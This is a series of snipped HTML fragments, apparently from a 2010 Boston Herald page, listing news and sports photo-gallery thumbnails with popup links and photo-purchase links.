...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4470','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101024/stp/a0d32d_102410regattamw006.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Head of the Charles Regatta"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Head of the Charles Regatta">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4467','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101023/stp/9174e7_102310bakerfn03.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Charlie Baker and Jeff Perry campaign"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Charlie Baker and Jeff Perry campaign">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4466','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101023/stp/7ccf23_102310rowce013.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4457','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101020/stp/cdecf9_101910lightbulbap01.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4454','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101019/stp/0fcd65_Face_Transplant__trose@heraldinteractive.com_2.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4453','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101019/stp/14c5ba_101810shootce007.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4451','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101017/stp/a3c123_101710graffiti05.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Graffiti crackdown"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Graffiti crackdown">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4450','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101017/stp/4a45aa_101710rowersnl09.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Iraqi rowers"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Iraqi rowers">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4447','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101017/stp/87b93c_101410shattuck06.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4446','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101016/stp/b64c00_101610campaignmg04.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Obama rallies for Deval Patrick"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Obama rallies for Deval Patrick">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4442','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101015/stp/837ea6_101510debatepw014.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Gubernatorial showdown"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Gubernatorial showdown">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4440','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101014/stp/da48ca_101310chambertf05.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Candidate Gallery"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Candidate Gallery">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4434','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101012/stp/4b050f_101010paradenl16.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Columbus day celebration"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Columbus day celebration">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4432','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101011/stp/9802b5_101010paradenl07.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Gubernatorial candidates campaign"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Gubernatorial candidates campaign">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4430','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101009/stp/f9305f_100910bakermh01.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Campaign trail"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Campaign trail">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4428','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101009/stp/840cf0_100910honkce012.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4426','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101009/stp/6012d0_100910battletf19.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\WWII reenactment"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\WWII reenactment">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4420','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101008/stp/a40909_100710schoolbusmg01.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\RMV crackdown"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\RMV crackdown">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4418','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101007/stp/761cae_100710shootingmg01.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\One dead in Lynn shooting"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\One dead in Lynn shooting">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4412','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101006/stp/1d7629_100610funeraltf01.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Funeral for a mother and child"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Funeral for a mother and child">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4408','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101005/stp/b88457_100510simbams06.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4402','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101004/stp/ff40b7_100110theT02.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4398','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101003/stp/7cbd67_100310blesstf04.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Pet blessings"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/News\\Pet blessings">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4519','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101107/stp/ad899b_110710patsms12.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4515','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101107/stp/c6e345_110610bruinsjw26.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4513','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101106/stp/53f1ab_110510celticssc12.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Celtics 110, Bulls 105"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Celtics 110, Bulls 105">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4501','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101104/stp/ffdc04_110310celticsms19.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4492','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101031/stp/641d55_103110pats21.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Patriots 28, Vikings 18"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Patriots 28, Vikings 18">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4488','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101030/stp/a96d05_103010bcfootballjw04.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\BC 16, James Madison 10"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\BC 16, James Madison 10">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4486','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101030/stp/e8607f_102910celticssc02.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4483','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101029/stp/246efe_102810patriotsmw03.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4482','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101029/stp/6bc6f8_102810bruinsms11.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4481','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101028/stp/f5cd39_102710patstf04.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4478','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101027/stp/ef4f2e_102610golftf10.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Division 2 golf state championships"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Division 2 golf state championships">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4477','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101027/stp/0ce3ae_102610patsplaygroundjw08.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Pats build playground"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Pats build playground">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4476','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101027/stp/fbfcb4_102610celticsmw30.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Celtics 88, Heat 80"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Celtics 88, Heat 80">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4474','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101025/stp/dd2552_102510golfmh03.jpg" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4473','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101025/stp/3b784d_102510allennl05.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Ray Allen plays `Knockout'"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Ray Allen plays `Knockout'">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4472','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101024/stp/d615fe_102410patsms002.JPG" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Patriots 23, Chargers 20"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Patriots 23, Chargers 20">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4468','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101023/stp/4a049f_102310bcfootballjw21.jpg" alt="Photo" /></a>
...[SNIP]...
<div style="position: relative; left: 3px; top: -3px;">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Maryland 24, Boston College 21"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/Sports\\Maryland 24, Boston College 21">Purchase</a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4465','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101023/stp/460e46_102210footballce017.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4463','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101022/stp/4c1d99_102110bruinsms16.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4461','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101021/stp/62874a_102010celticsms16.JPG" alt="Photo" /></a>
...[SNIP]...
<span class="breadcrumb" ><img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery"></span>
...[SNIP]...
<a href="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/?gallery_id=4458','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20101020/stp/fa4a70_101410sturmtf11.jpg" alt="Photo" /></a>
...[SNIP]...
